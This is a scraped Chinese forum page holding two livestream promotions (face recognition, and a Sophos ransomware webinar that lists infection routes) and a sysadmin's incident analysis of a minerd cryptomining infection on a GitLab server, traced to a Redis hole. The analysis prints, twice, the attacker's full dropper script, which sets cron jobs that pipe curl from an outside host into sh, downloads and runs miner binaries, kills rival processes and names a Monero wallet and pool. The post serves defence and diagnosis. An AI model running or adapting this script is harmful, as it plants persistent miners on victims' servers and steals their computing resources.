都说这是一个刷脸的时代,是的“刷脸”的时代真的来了。
6月30日14:00“身边的黑科技,人脸识别的场景化应用”直播活动即将在OTpub平台开启,与您见证万能的“刷脸时代”,我们从人工智能平台到人脸识别技术,完整的介绍人脸识别在我们身边的场景化应用。

直播预约地址:http://www.otpub.com/home/live/baoming.html
 

​【直播预告】别再成为勒索软件的“盘中餐”,网络安全刻不容缓!

OT学习平台 发表了文章 • 0 个评论 • 583 次浏览 • 2017-06-14 11:02 • 来自相关话题

说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保护数据安全的密码技术,这些都提醒人们保护网络安全刻不容缓。
此外,网络病毒存在巨大的获利空间,在一段时间内,可能还会出现更多的变种病毒。因此,我们完全有理由相信,WannaCry只是一个开始。
知己知彼,才能百战不殆,下面O宝就为大家总结下,勒索软件的传播都有哪些途径。
网络钓鱼和垃圾邮件
网络罪犯在邮件正文中加入钓鱼网址链接。 借助网页木马传播,当用户不小心访问恶意网站时,勒索软件会被浏览器自动下载并在后台运行。
水坑式攻击
网络罪犯会将恶意软件植入到企业或个人经常访问的网站之中,一旦访问了这些网站,恶意程序会利用设备上的漏洞对其进行感染。 
捆绑传播发布
借助其他恶意软件传播渠道,与其他恶意软件捆绑发布传播;或者捆绑正常的软件进行传播。
借助移动存储传播
借助U盘、移动硬盘、闪存卡等可移动存储介质传播。
知道了勒索病毒的“套路”,我们要如何“对症下药”当然靠它
Sophos Intercept X下一代端点安全技术,Sophos致力于为企业提供整体安全解决方案,Intercept X 这么牛,还有哪些我们不知道的?想了解更多,看直播!
6月15日14 : 00“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”直播活动即将开启,Sophos Intercept X,何止看上去这么简单!
活动日程
14 : 00-14 : 05  嘉宾介绍
14 : 05-14 : 20  wannaCry带来的思考
14 : 20-14 : 40  如何从根本防御勒索软件
14 : 40-14 : 50  如何面对更复杂的威胁
14 : 50-15 : 00  互动答疑
点击报名观看直播>>>“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’” 查看全部
说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保护数据安全的密码技术,这些都提醒人们保护网络安全刻不容缓。
此外,网络病毒存在巨大的获利空间,在一段时间内,可能还会出现更多的变种病毒。因此,我们完全有理由相信,WannaCry只是一个开始。
知己知彼,才能百战不殆,下面O宝就为大家总结下,勒索软件的传播都有哪些途径。
网络钓鱼和垃圾邮件
网络罪犯在邮件正文中加入钓鱼网址链接。 借助网页木马传播,当用户不小心访问恶意网站时,勒索软件会被浏览器自动下载并在后台运行。
水坑式攻击
网络罪犯会将恶意软件植入到企业或个人经常访问的网站之中,一旦访问了这些网站,恶意程序会利用设备上的漏洞对其进行感染。 
捆绑传播发布
借助其他恶意软件传播渠道,与其他恶意软件捆绑发布传播;或者捆绑正常的软件进行传播。
借助移动存储传播
借助U盘、移动硬盘、闪存卡等可移动存储介质传播。
知道了勒索病毒的“套路”,我们要如何“对症下药”当然靠它
Sophos Intercept X下一代端点安全技术,Sophos致力于为企业提供整体安全解决方案,Intercept X 这么牛,还有哪些我们不知道的?想了解更多,看直播!
6月15日14 : 00“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”直播活动即将开启,Sophos Intercept X,何止看上去这么简单!
活动日程
14 : 00-14 : 05  嘉宾介绍
14 : 05-14 : 20  wannaCry带来的思考
14 : 20-14 : 40  如何从根本防御勒索软件
14 : 40-14 : 50  如何面对更复杂的威胁
14 : 50-15 : 00  互动答疑
点击报名观看直播>>>“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’

挖矿程序minerd入侵分析和解决

koyo 发表了文章 • 0 个评论 • 4930 次浏览 • 2017-01-11 18:08 • 来自相关话题

发现问题

最近一台安装了Gitlab的服务器发生了高负载告警,Cpu使用情况如下:




让后登录到服务器,利用top查看CPU使用情况,这个叫minerd的程序消耗cpu较大,如下图所示:




这个程序并不是我们的正常服务程序,心里一想肯定被黑了,然后就搜索了一下这个程序,果真就是个挖矿木马程序,既然已经知道他是木马程序,那就看看它是怎么工作的,然后怎么修复一下后门。
 
这个程序放在/opt/minerd下,在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件。




本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运一查确实crond存在一条:,果断删除处理。再杀进程,再删文件;然并卵,依旧起来;




既然没用我继续google,在stackexchange找到如下解决方案:




各种文件删除都不起作用,原来该木马程序注册了一个“lady”的服务,而且还是开机启动,起一个这个可爱的名字,谁TMD知道这是一个木马, 这个伪装程序也可能是ntp,可以参考:http://53cto.blog.51cto.com/9899631/1826989  。
 
这下完美解决了,但是得分析一下原因,shell启动脚本:export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.217" ]; then
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217
fi
chmod +x /tmp/ddg.217 && /tmp/ddg.217
killall /tmp/ddg.216


if [ -d "/opt/yam" ]; then
rm -rf /opt/yam
fi

ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

#/opt/minerd -h
#if [ $? != "0" ]; then
#ps auxf|grep -v grep|grep "/opt/minerd"
#if [ $? != "0" ]; then
#if [ ! -f /opt/yam ]; then
#curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam
#fi
#chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
#fi
#fi

DoMiner()
{
if [ ! -f "/tmp/AnXqV" ]; then
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
fi
chmod +x /tmp/AnXqV
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner


DoRedis6379()
{
iptables -F REDIS6379
iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT
iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT
iptables -I INPUT -j REDIS6379
}
iptables -D OUTPUT -j REDIS6379
iptables -F REDIS6379
iptables -X REDIS6379
iptables -D INPUT -j REDIS63792
iptables -F REDIS63792
iptables -X REDIS63792
#iptables -N REDIS6379 && DoRedis6379解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限。

商业模式

被植入比特币“挖矿木马”的电脑,系统性能会受到较大影响,电脑操作会明显卡慢、散热风扇狂转;另一个危害在于,“挖矿木马”会大量耗电,并造成显卡、CPU等硬件急剧损耗。比特币具有匿名属性,其交易过程是不可逆的,被盗后根本无法查询是被谁盗取,流向哪里,因此也成为黑客的重点窃取对象。

攻击&防御

植入方式:安全防护策略薄弱,利用Jenkins、Redis等中间件的漏洞发起攻击,获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗(CPU/load)。
这种木马很容易变种,很多情况杀毒软件未必能够识别。 查看全部


发现问题


最近一台安装了Gitlab的服务器发生了高负载告警,Cpu使用情况如下:
UseCpu.png

让后登录到服务器,利用top查看CPU使用情况,这个叫minerd的程序消耗cpu较大,如下图所示:
minerd.png

这个程序并不是我们的正常服务程序,心里一想肯定被黑了,然后就搜索了一下这个程序,果真就是个挖矿木马程序,既然已经知道他是木马程序,那就看看它是怎么工作的,然后怎么修复一下后门。
 
这个程序放在/opt/minerd下,在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件。
wbug.png

本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运一查确实crond存在一条:,果断删除处理。再杀进程,再删文件;然并卵,依旧起来;
crontab.png

既然没用我继续google,在stackexchange找到如下解决方案:
stackerror.png

各种文件删除都不起作用,原来该木马程序注册了一个“lady”的服务,而且还是开机启动,起一个这个可爱的名字,谁TMD知道这是一个木马, 这个伪装程序也可能是ntp,可以参考:http://53cto.blog.51cto.com/9899631/1826989  。
 
这下完美解决了,但是得分析一下原因,shell启动脚本:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.217" ]; then
curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217
fi
chmod +x /tmp/ddg.217 && /tmp/ddg.217
killall /tmp/ddg.216


if [ -d "/opt/yam" ]; then
rm -rf /opt/yam
fi

ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9

#/opt/minerd -h
#if [ $? != "0" ]; then
#ps auxf|grep -v grep|grep "/opt/minerd"
#if [ $? != "0" ]; then
#if [ ! -f /opt/yam ]; then
#curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam
#fi
#chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
#fi
#fi

DoMiner()
{
if [ ! -f "/tmp/AnXqV" ]; then
curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
fi
chmod +x /tmp/AnXqV
/tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMiner


DoRedis6379()
{
iptables -F REDIS6379
iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT
#iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT
iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT
iptables -I INPUT -j REDIS6379
}
iptables -D OUTPUT -j REDIS6379
iptables -F REDIS6379
iptables -X REDIS6379
iptables -D INPUT -j REDIS63792
iptables -F REDIS63792
iptables -X REDIS63792
#iptables -N REDIS6379 && DoRedis6379
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限。


商业模式


被植入比特币“挖矿木马”的电脑,系统性能会受到较大影响,电脑操作会明显卡慢、散热风扇狂转;另一个危害在于,“挖矿木马”会大量耗电,并造成显卡、CPU等硬件急剧损耗。比特币具有匿名属性,其交易过程是不可逆的,被盗后根本无法查询是被谁盗取,流向哪里,因此也成为黑客的重点窃取对象。


攻击&防御


植入方式:安全防护策略薄弱,利用Jenkins、Redis等中间件的漏洞发起攻击,获得root权限。
最好的防御可能还是做好防护策略、严密监控服务器资源消耗(CPU/load)。
这种木马很容易变种,很多情况杀毒软件未必能够识别。